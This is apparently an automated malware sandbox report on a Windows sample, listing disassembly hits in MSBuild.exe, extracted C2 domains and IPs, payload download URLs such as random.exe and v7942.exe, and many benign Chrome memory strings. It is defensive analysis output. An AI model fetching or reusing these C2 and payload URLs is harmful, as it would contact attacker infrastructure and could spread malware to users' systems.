Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_0042C040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000AEh] 24_2_00424073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000AEh] 24_2_0042407C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000A0h] 24_2_0041D17F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h] 24_2_00429120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-6Ch] 24_2_004491AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov al, 01h 24_2_00413203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+256995C6h] 24_2_0041B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, eax 24_2_004082B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00432348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [esi], cl 24_2_00435460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00445430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], cl 24_2_004224E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then push ebp 24_2_004444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h] 24_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-1ACD9926h] 24_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000584h] 24_2_0041C512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_00432530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+edi+14h] 24_2_00432530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 24_2_00433600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 24_2_004406C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 24_2_004376EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ebx], cl 24_2_004376EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 24_2_004496E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_0041F706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000084h] 24_2_00430711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [ecx], dl 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], cl 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h] 24_2_00432872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edi+7A78CEDCh] 24_2_0044A896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [ecx] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax] 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax] 24_2_0044CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28A0A914h] 24_2_00448A32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [esi], ax 24_2_00431B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esi+01h] 24_2_00401B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+28h] 24_2_0041FB2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 24_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 24_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2059B2B8h] 24_2_0040DB98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr [esp+38h] 24_2_00444C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov esi, ecx 24_2_0044BCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], A26ABC73h 24_2_0044BCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch] 24_2_0042EE0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 24_2_0040AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch] 24_2_0042EE11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], bl 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edi], bl 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], al 24_2_0042FEF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 24_2_0042EB65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov byte ptr [edx], al 24_2_0042FF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h] 24_2_0042EF34
Source: chrome.exe Memory has grown: Private usage: 1MB later: 39MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: scenarisacri.top/gHSAYuqo
Source: Malware configuration extractor URLs: oreheatq.live/gsopp
Source: Malware configuration extractor URLs: castmaxw.run/ganzde
Source: Malware configuration extractor URLs: weldorae.digital/geds
Source: Malware configuration extractor URLs: steelixr.live/aguiz
Source: Malware configuration extractor URLs: advennture.top/GKsiio
Source: Malware configuration extractor URLs: targett.top/dsANGt
Source: Malware configuration extractor URLs: smeltingt.run/giiaus
Source: Malware configuration extractor URLs: ferromny.digital/gwpd
Source: Malware configuration extractor IPs: 176.113.115.6
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View IP Address: 1.1.1.1 1.1.1.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent, 0_2_00E5CF1A
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000003.1669538946.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1673168923.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1673367845.00005B0400334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000002D.00000003.1669538946.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1673168923.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1673367845.00005B0400334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1843799682.00005B0401568000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1788213185.00005B04011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1772711956.00005B0400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1846887338.00005B0401988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1844256638.00005B0401578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1846341231.00005B04018D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1718476747.00005B0401880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002D.00000002.1793807072.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.906544930.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.906544930.0000000005097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7
Source: rapes.exe, 00000015.00000003.1823364301.000000000165E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7/files/martin2/random.exe
Source: powershell.exe, 00000008.00000002.938454172.000001551D822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.935739895.0000015519E6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.935607290.0000015519D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: mshta.exe, 00000003.00000003.872269379.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.874064568.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.872069644.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.872236318.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.788
Source: futors.exe, 0000002B.00000003.1859893813.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.90.153.244/v7942.exe
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000002D.00000002.1772224335.00005B0400978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
Source: chrome.exe, 0000002D.00000002.1772638188.00005B0400A58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000002D.00000002.1779428372.00005B040116C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: svchost.exe, 0000000E.00000003.1203134436.0000024B72000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chrome.exe, 0000002D.00000002.1761519610.00005B040008A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: powershell.exe, 00000005.00000002.908984573.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BBF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.984922811.000001552BD36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: powershell.exe, 00000005.00000002.906544930.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.938454172.000001551BB81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000002D.00000002.1777298252.00005B0400EC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000008.00000002.938454172.000001551BDAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000F.00000002.1369547315.0000021485013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: chrome.exe, 0000002D.00000002.1777604042.00005B0400F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: powershell.exe, 00000008.00000002.989509140.0000015533DEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.990863464.0000015534010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.micrt.com0
Source: chrome.exe, 0000002D.00000002.1777350807.00005B0400EF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000002D.00000002.1761433177.00005B0400030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000002D.00000002.1846404832.00005B04018E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000002D.00000002.1761614499.00005B04000A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000002D.00000002.1761614499.00005B04000A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000002D.00000002.1762520260.00005B040020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000002D.00000002.1762566968.00005B0400238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000002D.00000002.1764299921.00005B0400864000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: powershell.exe, 00000008.00000002.938454172.000001551BB81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.906544930.0000000004D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBAr
Source: chrome.exe, 0000002D.00000003.1717783680.00005B0401428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717142339.00005B0401A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1717328921.00005B04016F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000002D.00000002.1841972972.00005B0401510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1845660835.00005B0401674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes
Source: svchost.exe, 0000000F.00000003.1368943282.0000021485058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: json[1].json.27.dr String found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
Source: chrome.exe, 0000002D.00000002.1772750526.00005B0400AA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: 68qi5p.27.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 68qi5p.27.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: chrome.exe, 0000002D.00000003.1716324803.00005B04016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716539122.00005B0400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716667387.00005B0401114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1716476239.00005B0401700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com
